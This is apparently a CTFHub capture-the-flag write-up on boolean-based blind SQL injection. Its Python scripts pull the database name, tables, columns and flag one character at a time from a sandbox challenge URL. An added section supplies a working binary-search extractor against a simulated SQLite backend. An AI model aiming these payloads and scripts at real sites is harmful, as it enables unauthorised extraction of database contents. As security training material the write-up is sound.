
ctfhub - SQL boolean-based blind injection

2022-06-11 17:46:00 榴莲 蛋挞

Open the challenge URL and first submit:

1 and length(database())>3

Result:

Then submit:

1 and length(database())<3

Result:

The page answers a true condition and a false condition differently, while echoing nothing from the query itself. That is exactly what a boolean-based blind injection needs: each request leaks one bit (whether the condition held), and the data is reassembled from many such requests.

Extract the name of the current database, one character at a time (the script asks "is character j of database() equal to ASCII code i?" and keeps the i for which the page reports success):

import requests

sess = requests.session()   # named 'sess' rather than 're', which shadows the regex module
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 5):                      # positions 1..4 (the name turns out to be 4 characters)
    for i in range(43, 127):               # candidate ASCII codes '+'..'~'; space and '!'..'*' are not tried
        # True only when character j of database() has ASCII code i
        ss = "?id=1 and ascii(substr(database()," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:          # the page's marker for "a row was returned"
            st += chr(i)
            break
print(st)

Next, enumerate the tables in the current database (sqli). The payload, with j the position and i the candidate ASCII code, is:

?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),j,1))=i

import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 10):                     # first 9 characters of the comma-separated table list; raise if it is cut off
    for i in range(43, 127):               # candidate ASCII codes '+'..'~' (',' between names is 44, so it is covered)
        ss = "?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli')," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:
            st += chr(i)
            break
print(st)

Result:


Next, list the columns of the flag table:

?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),j,1))=i
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 10):                     # first 9 characters of the comma-separated column list
    for i in range(43, 127):               # candidate ASCII codes '+'..'~'
        ss = "?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag')," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:
            st += chr(i)
            break
print(st)

Result:

Finally, read the contents of the flag column in the flag table:

?id=1 and ascii(substr((select flag from flag),j,1))=i
import requests

sess = requests.session()
url1 = 'http://challenge-0d74f816c8e31da2.sandbox.ctfhub.com:10800/'
st = ''
for j in range(1, 40):                     # up to 39 characters; a longer flag would be truncated here
    for i in range(43, 127):               # candidate ASCII codes '+'..'~'
        ss = "?id=1 and ascii(substr((select flag from flag)," + str(j) + ",1))=" + str(i)
        url = url1 + ss
        pa = sess.get(url=url).text
        if "query_success" in pa:
            st += chr(i)
            break
print(st)

Result:
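The four scripts above share one weakness: they scan every candidate code linearly (up to 83 requests per character), guess the output length with a fixed range, and skip characters outside 43..125 (space, '!'..'*' and '~'). The following is an added example, not code from the original post: it runs the same boolean-blind technique against a constructed stand-in for the challenge (an in-memory SQLite database with a news table and a flag table, MySQL's ascii() registered by hand, and a page that returns only "query_success" or "query_error"), but first binary-searches the length, then binary-searches each character over the full byte range. The flag value and table layout are constructed for the demo.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the challenge backend (assumption: the real target is
# MySQL behind a page that only reveals whether the query returned a row).
SECRET_FLAG = "ctfhub{constructed_example_flag}"   # constructed sample, not the real flag


def build_backend() -> sqlite3.Connection:
    """In-memory SQLite database shaped like the challenge: a news table queried
    by id, and a flag table holding the secret."""
    con = sqlite3.connect(":memory:")
    # MySQL has ascii(); SQLite does not, so register an equivalent so the
    # page's own payload syntax works unchanged.
    con.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    con.execute("CREATE TABLE news (id INTEGER, data TEXT)")
    con.execute("INSERT INTO news VALUES (1, 'hello world')")
    con.execute("CREATE TABLE flag (flag TEXT)")
    con.execute("INSERT INTO flag VALUES (?)", (SECRET_FLAG,))
    return con


def vulnerable_page(con: sqlite3.Connection, user_id: str) -> str:
    """The injectable endpoint: `id` is concatenated into the SQL (the bug), and
    the response is one of two fixed strings, as on the CTFHub page."""
    sql = "SELECT data FROM news WHERE id=" + user_id
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "query_error"
    return "query_success" if rows else "query_error"


class BlindExtractor:
    """Boolean-blind extraction with binary search over length and ASCII code,
    so each character costs 8 requests instead of up to 83."""

    def __init__(self, oracle: Callable[[str], bool]) -> None:
        self.oracle = oracle     # oracle(condition) -> True iff the condition held
        self.queries = 0         # request counter, to compare with the linear scan

    def ask(self, condition: str) -> bool:
        self.queries += 1
        return self.oracle(condition)

    def _smallest_true(self, value_sql: str, lo: int, hi: int) -> int:
        """Smallest v in [lo, hi] for which `value_sql<=v` holds (hi if none)."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{value_sql}<={mid}"):
                hi = mid
            else:
                lo = mid + 1
        return lo

    def length_of(self, expr: str, max_len: int = 1024) -> int:
        # Establish the length first instead of guessing range(1, 40).
        return self._smallest_true(f"length(({expr}))", 0, max_len)

    def char_at(self, expr: str, pos: int) -> str:
        # Search the full byte range: MySQL ascii() returns the leftmost byte (0..255),
        # so space, punctuation below '+' and '~' are all recoverable.
        return chr(self._smallest_true(f"ascii(substr(({expr}),{pos},1))", 0, 255))

    def extract(self, expr: str) -> str:
        n = self.length_of(expr)
        return "".join(self.char_at(expr, i) for i in range(1, n + 1))


def run_demo() -> dict:
    """Dump the flag through the simulated oracle and report the request count."""
    con = build_backend()

    def oracle(cond: str) -> bool:
        # Same shape as the page's payloads: ?id=1 and <condition>
        return "query_success" in vulnerable_page(con, f"1 and ({cond})")

    ex = BlindExtractor(oracle)
    flag = ex.extract("select flag from flag")
    return {"flag": flag, "length": len(flag), "queries": ex.queries}


if __name__ == "__main__":
    print(run_demo())
```

To use it against the real challenge, replace the oracle with one that sends `url1 + "?id=1 and " + cond` through requests and tests for "query_success" in the body; the extraction logic does not change. For a 32-character flag the demo needs about 267 requests in total (11 for the length, 8 per character), against a worst case of over 2,600 for the linear scan.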


Copyright notice
This article was written by [榴莲 蛋挞]; when reposting, please include a link to the original. Thank you.
https://blog.csdn.net/god_001/article/details/125089191